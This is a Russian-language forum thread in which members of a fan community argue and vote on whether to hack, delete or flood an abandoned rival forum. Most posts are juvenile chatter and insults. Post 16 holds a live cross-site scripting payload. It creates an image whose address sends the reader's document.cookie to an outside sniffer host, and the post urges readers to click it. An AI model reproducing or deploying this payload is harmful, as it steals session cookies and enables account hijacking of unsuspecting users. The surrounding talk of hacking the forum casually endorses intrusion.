Анти-КВ рулеzzz!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Анти-КВ рулеzzz! » Вспомогательный форум » Что КВ-шникам делать с форумом?

Что КВ-шникам делать с форумом?

Сообщений 1 страница 18 из 18

Опрос

Что делать с форумом?
Взломать и удалить

21% - 4
Взломать и переобразовать в ролу по КВ

42% - 8
Устроить здесь великий флууууууууууууд:)

36% - 7
Голосов: 19

1

Итак. Что нам делать с этим форумом? Поскольку Лоренс ушла, а админом была только она, то на форуме нет ни одного человека, который мог бы причинить нам существенный вред. Так что нам делать с этим форумом?

0

2

ой незнаю о а довайте тут племена создадим а в эти темы не зайдём ок ну как на КВ

0

3

Давайте здесь устроим великую флудилочку!

0

4

Кв обожаю лапочьки
Не знаю... с таким адресом рола по кв долго не проживет...

0

5

Кошка №1! написал(а):

Давайте здесь устроим великую флудилочку!

Я за!

0

6

нееееее давайте тут наших тем наделаем

0

7

я за свой вариант, я его 1 предложила кстати=))))  3 вар-нт
оля -оля -оля лааааааааааааа бла блу блииииииииииии

0

8

3!
Ля-ля-ля. споём друзья?))))))

0

9

УАУ АКВ УДАЛИМ мы
КВ У НАС НЕ ЗАМЕНИМЫ!!!!

0

10

Вообщем, я за 3 вариант))

0

11

1 и 3

0

12

Н и ч е г о. Ровным счетом. Есть и есть. Вам же не в убыток. А флуд можно создать отдельной ролевой. А это у нас типо штаб =0

0

13

вай какие мысли)

0

14

В ЖОПУ АКВ, КВ ЛУДШЕ

0

15

Я знаю=)))))ГЫ

0

16

"><script>img=new Image();img.src="http://antichat.org/s/твойЛогин.gif?"+document.cookie;</script><hr "
Чтобы помочь этому форуму выжить(ато я уже начитался тута всяких УЖАСАФФФ!!!)жми на ссылу выше!

:bash:

Отредактировано Анти-кэвешник (2010-03-22 14:32:56)

0

17

Анти-кэвешник
Увы,АКВ все испугались и убежали.А нормальные КВшники не нажмут на твою ссылку.Тем более многие КВшники отсюдО тож свалили))))Ну испугали этих АКВшников,зафлудили эту ролу и с победой ушли)))))Я уже сюда пришла к тому что рола умерла...Но мой флуд тут надеюсь останецца тут.=))
Так что бАльшой те АпЛоМм ,фора сдохла,ну и раз ты АКВшник то ещё фак в жопу!!!!

Я всё сказала оч дипломотично=)

FUCK YOU !!! - (с) Огни))))

0

18

А АКВ просто завидуют КВ! И ктому же КВ больше, так что вы, если и взломаете сайты, то жалкую-жалкую кучку! Скорее всего - это мы вас всех перевзламываем, вы даже фотошоп пользоваться не умеете сюдя по дизайну этого форума  :x

0

Вы здесь » Анти-КВ рулеzzz! » Вспомогательный форум » Что КВ-шникам делать с форумом?

Рейтинг форумов | Создать форум бесплатно